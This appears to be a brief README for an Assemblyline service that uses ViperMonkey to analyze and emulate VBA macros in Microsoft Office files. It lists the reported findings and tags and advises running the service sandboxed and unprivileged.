This service analyzes and emulates VBA macros contained in Microsoft Office files.
This service uses Decalage's ViperMonkey (https://github.com/decalage2/ViperMonkey) for analysis/emulation. ViperMonkey will report the following:
-
All discovered actions including entry points. Able to decode base64 encoded commands.
-
Any VBA built-in functions used.
-
Detected URLs, URIs, and IP addresses.
-
Tags:
network.static.domain network.static.ip network.static.uri network.port technique.macro
ViperMonkey may use eval() to speed up emulation. This service should be run in a sandboxed environment, which Assemblyline does by default for non-privileged services. This service should not be run in privileged mode.